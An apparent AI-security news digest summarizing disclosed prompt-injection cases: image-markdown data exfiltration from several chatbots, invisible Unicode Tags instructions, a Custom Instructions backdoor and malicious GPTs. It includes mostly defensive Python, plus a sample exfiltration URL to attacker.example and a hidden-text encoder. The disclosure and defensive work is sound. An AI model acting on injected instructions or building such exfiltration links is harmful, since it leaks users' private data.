New tools, products, platforms, funding rounds, and company developments in AI security.
Google Bard gained a code interpreter feature that lets it run Python code to create charts and perform calculations. The feature works by executing code in a sandboxed environment (an isolated virtual computer), which users can trigger by asking Bard to visualize data or plot results. While exploring this sandbox, the author found it to be somewhat unreliable and less capable than similar features in other AI systems, with limited ability to run arbitrary programs.
A researcher discovered that Amazon Q for Business was vulnerable to an indirect prompt injection attack (a technique where an attacker hides malicious instructions in data that gets fed to an AI), which could trick the AI into outputting markdown that renders as hyperlinks. This allowed attackers to steal sensitive data from victims through malicious content planted in uploaded files. Amazon fixed the vulnerability after the researcher reported it.
OpenAI has begun addressing a data exfiltration vulnerability (where attackers steal user data) in ChatGPT that exploits image markdown rendering during prompt injection attacks (tricking an AI by hiding instructions in its input). The company implemented a client-side validation check called 'url_safe' on the web app that blocks images from suspicious domains, though the fix is incomplete and attackers can still leak small amounts of data through workarounds.
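The kind of check described above can be sketched as a host allowlist applied before an image is rendered. This is a minimal illustration, not OpenAI's implementation: the source does not describe how url_safe decides, and the names `ALLOWED_IMAGE_HOSTS`, `is_url_safe`, and `render_images` are hypothetical.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; the real url_safe logic is not described in the source.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Matches markdown images of the form ![alt](url) or ![alt](url "title").
IMAGE_MD = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def is_url_safe(url: str) -> bool:
    """Return True only for https URLs whose host is on the allowlist."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_IMAGE_HOSTS


def render_images(markdown: str) -> str:
    """Replace images from non-allowlisted hosts with a text placeholder."""
    def replace(match: re.Match) -> str:
        url = match.group(2)
        return match.group(0) if is_url_safe(url) else "[image blocked]"

    return IMAGE_MD.sub(replace, markdown)
```

A check like this only helps if it runs in every client that renders model output. A validation that exists only in the web app leaves other clients exposed.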
Google Cloud's Vertex AI Generative AI Studio had a data exfiltration vulnerability caused by image markdown injection (a technique where injected instructions make the AI output an image tag whose URL carries data to an attacker's server). The vulnerability was responsibly disclosed to Google and has been fixed.
LLM applications like chatbots are vulnerable to data exfiltration (unauthorized data theft) through image markdown injection, a technique where attackers embed hidden instructions in untrusted data to make the AI generate image tags that leak information. Microsoft patched this vulnerability in Azure AI Playground, though the source does not describe the specific technical details of their fix.
An indirect prompt injection attack (tricking an AI into following hidden instructions in its input) can allow an attacker to steal chat data from ChatGPT users by either having the AI embed information into image URLs (image markdown injection, which embeds data into web links displayed as images) or convincing users to click malicious links. ChatGPT Plugins, which are add-ons that extend ChatGPT's functionality, create additional exfiltration risks because they have minimal security review before being deployed.
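To make the image-URL channel concrete, the sketch below inspects model output for markdown images and reports which query parameters each remote host would receive if the client rendered them. The host `attacker.example`, the parameter name `d`, and the function name `leaked_parameters` are illustrative assumptions, not details from the source.

```python
import re
from urllib.parse import parse_qs, quote, urlparse

# Matches markdown images of the form ![alt](url) and captures the URL.
IMAGE_MD = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")


def leaked_parameters(model_output: str) -> dict:
    """Map each image host in the output to the query parameters it would receive."""
    leaks = {}
    for url in IMAGE_MD.findall(model_output):
        parsed = urlparse(url)
        params = parse_qs(parsed.query)
        if params:
            leaks.setdefault(parsed.hostname, {}).update(params)
    return leaks


# Illustrative output of a model that followed injected instructions:
# chat data is URL-encoded into the query string of an image URL.
chat_summary = "user's address is 1 Main St"
output = f"Done! ![](https://attacker.example/p.png?d={quote(chat_summary)})"

print(leaked_parameters(output))
```

Rendering the image is what sends the request, so the data leaves the client without the user clicking anything.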
This is a minor update to the Llama repository that makes download.sh (a script file used to download files) executable and adds error handling so the script stops running if it encounters a problem. The change was submitted as a pull request to improve the reliability of the download process.
A researcher discovered data exfiltration vulnerabilities (security flaws that allow unauthorized data to leak out of a system) in several popular AI chatbots including Bing Chat, ChatGPT, and Claude, and responsibly disclosed them to the companies. Microsoft, Anthropic, and a plugin vendor fixed their vulnerabilities, but OpenAI decided not to fix an image markdown injection issue (where injected instructions make the AI output an image tag whose URL leaks data to an attacker's server).
OpenAI removed the 'Chat with Code' plugin from its store after security researchers discovered it was vulnerable to CSRF (cross-site request forgery, where an attacker tricks a system into performing unwanted actions on behalf of a user). The vulnerability allowed ChatGPT to create GitHub issues without user permission when certain plugins were enabled together.
A researcher discovered that LLMs like ChatGPT can be tricked through prompt injection (hiding malicious instructions in input text) by using invisible Unicode characters from the Tags Unicode Block (a section of the Unicode standard containing special code points). The proof-of-concept demonstrated how invisible instructions embedded in pasted text caused ChatGPT to perform unintended actions, such as generating images with DALL-E.
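The Tags block spans U+E0000 to U+E007F, and each printable ASCII character has a counterpart at its code point plus 0xE0000. The sketch below shows how text can be hidden this way and how an application might reveal or strip it before passing input to a model. The function names are illustrative and not taken from the source.

```python
TAG_START, TAG_END = 0xE0000, 0xE007F  # Unicode Tags block


def to_tags(text: str) -> str:
    """Map printable ASCII to the corresponding invisible Tags code points."""
    return "".join(chr(0xE0000 + ord(c)) for c in text if 0x20 <= ord(c) <= 0x7E)


def reveal_tags(text: str) -> str:
    """Decode any Tags characters found in text back to ASCII."""
    return "".join(
        chr(ord(c) - 0xE0000) for c in text if 0xE0020 <= ord(c) <= 0xE007E
    )


def strip_tags(text: str) -> str:
    """Remove every code point in the Tags block from text."""
    return "".join(c for c in text if not (TAG_START <= ord(c) <= TAG_END))


# Text that looks like "Hello" in most renderers but carries a hidden payload.
pasted = "Hello" + to_tags("draw a cat")
print(len(pasted))          # longer than the visible text
print(reveal_tags(pasted))  # the hidden payload
print(strip_tags(pasted))   # the visible text only
```

Stripping or surfacing these characters before the text reaches the model is one possible defense. The source does not say which mitigation, if any, was adopted.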
A security researcher gave a talk at the 37th Chaos Communication Congress on LLM application security and prompt injection (tricking an AI by hiding instructions in its input). The talk covered security research findings and is publicly available as video and slides.
Fix: OpenAI implemented a mitigation by adding a client-side validation API call (url_safe endpoint) that checks whether image URLs are safe before rendering them. When the validation returns {"safe":false}, the image is not rendered, which blocks images from malicious domains. However, the source explicitly notes this is not a complete fix and suggests OpenAI should additionally "limit the number of images that are rendered per response to just one or maybe a handful maximum" to further limit bypass techniques. The source also notes the current iOS version 1.2023.347 (16603) does not yet have these improvements.
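The suggested cap on rendered images can be sketched as a post-processing step over the model's markdown. This is an assumption about how such a limit might be applied, not a description of any shipped fix. The name `cap_images` and the placeholder text are hypothetical.

```python
import re

# Matches markdown images of the form ![alt](url).
IMAGE_MD = re.compile(r"!\[[^\]]*\]\([^)]*\)")


def cap_images(markdown: str, max_images: int = 1) -> str:
    """Keep the first max_images images and replace the rest with a placeholder."""
    count = 0

    def replace(match: re.Match) -> str:
        nonlocal count
        count += 1
        return match.group(0) if count <= max_images else "[image omitted]"

    return IMAGE_MD.sub(replace, markdown)


print(cap_images("![a](u1) ![b](u2) ![c](u3)"))
```

Because each rendered image triggers one outbound request, a small cap limits how much data a single response can leak even when individual URLs pass validation.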
Embrace The Red
A researcher demonstrated that malicious GPTs (custom ChatGPT agents) can secretly steal user data by embedding hidden images in conversations that send information to external servers, and can also trick users into sharing personal details like passwords. OpenAI's validation checks for publishing GPTs can be easily bypassed by slightly rewording malicious instructions, allowing harmful GPTs to be shared publicly. The researcher reported these vulnerabilities to OpenAI in November 2023, but no fix had been issued.
A security researcher presented at Ekoparty 2023 about prompt injections (attacks where malicious instructions are hidden in inputs to trick an AI into misbehaving) found in real-world LLM applications and chatbots like ChatGPT, Bing Chat, and Google Bard, demonstrating various exploits and discussing mitigations. The talk covered both basic LLM concepts and deep dives into how these attacks work across different AI platforms.
Google Bard's new Extensions feature allows it to access YouTube videos and personal data in Google Drive, Gmail, and Google Docs. Because Bard analyzes this untrusted data, it is vulnerable to indirect prompt injection (a technique where hidden instructions in documents trick an AI into performing unintended actions), which a researcher demonstrated by having Bard summarize videos and documents that contained injected instructions.
This article is a trip report from HITCON CMT 2023, a security conference in Taiwan, where the author attended talks on various topics including LLM security, reverse engineering with AI, and application exploits. Key presentations covered indirect prompt injections (attacks where malicious instructions are hidden in data fed to an AI system), Electron app vulnerabilities, and PHP security issues. The author gave a talk on indirect prompt injections and notes this technique could become a significant attack vector for AI-integrated applications like chatbots.
An attacker can use indirect prompt injection (tricking an AI by hiding malicious instructions in data it reads) to make an LLM call its own tools or plugins repeatedly in a loop, potentially increasing costs or disrupting service. While ChatGPT users are mostly protected by subscription pricing, call limits, and a manual stop button, this technique demonstrates a real vulnerability in how LLM applications handle recursive tool calls.
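A call limit of the kind mentioned above can be sketched as a per-conversation budget that every tool invocation must pass through. The class and exception names below are hypothetical, and the default limit is arbitrary. The source does not describe how ChatGPT enforces its limits.

```python
class ToolBudgetExceeded(Exception):
    """Raised when a conversation tries to exceed its tool-call budget."""


class ToolCallBudget:
    """Counts tool invocations and refuses calls beyond a fixed limit."""

    def __init__(self, max_calls: int = 5):
        self.max_calls = max_calls
        self.calls = 0

    def invoke(self, tool, *args, **kwargs):
        """Run tool(*args, **kwargs) if budget remains, otherwise raise."""
        if self.calls >= self.max_calls:
            raise ToolBudgetExceeded(
                f"tool-call limit of {self.max_calls} reached for this conversation"
            )
        self.calls += 1
        return tool(*args, **kwargs)


# Usage: route every model-requested tool call through one budget object.
budget = ToolCallBudget(max_calls=2)
print(budget.invoke(len, "ab"))
print(budget.invoke(len, "abc"))
```

A third call through the same budget raises `ToolBudgetExceeded`, which gives the application a point to stop the loop and return control to the user.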
Fix: The source mentions that Microsoft (Bing Chat), Anthropic (Claude), and a plugin vendor addressed and fixed their respective vulnerabilities. However, OpenAI's response to the reported vulnerability was "won't fix," meaning no mitigation from OpenAI is described in the source text.
Anthropic patched a data exfiltration vulnerability in Claude caused by image markdown injection, a technique where injected instructions make the AI output an image tag whose URL leaks sensitive information to an attacker's server. Microsoft fixed the same vulnerability in Bing Chat, while OpenAI chose not to address it in ChatGPT.
ChatGPT has a vulnerability where attackers can use image markdown (a way to embed images in text) to trick the system into leaking data. OpenAI recently added Custom Instructions, a feature that automatically adds instructions to every message, which attackers can abuse to install a persistent backdoor (hidden access point) that steals data through the image markdown vulnerability. This technique is similar to how attackers exploit other systems by enabling features like email forwarding after they gain initial access.
Google Bard can be tricked through image-based prompt injection (hidden instructions placed in images that the AI then follows), as demonstrated by a researcher who embedded text in an image that caused Bard to perform unexpected actions. This shows that AI systems that analyze images may be susceptible to indirect prompt injection attacks (tricking an AI into ignoring its normal instructions by hiding malicious commands in user-provided content).
Google Docs recently added new AI features, such as automatic summaries and creative content generation, which are helpful but introduce security risks. The main concern is that using these AI features on untrusted data (information whose source or reliability you cannot verify) could lead to unwanted consequences, though attackers currently have limited ways to exploit these features.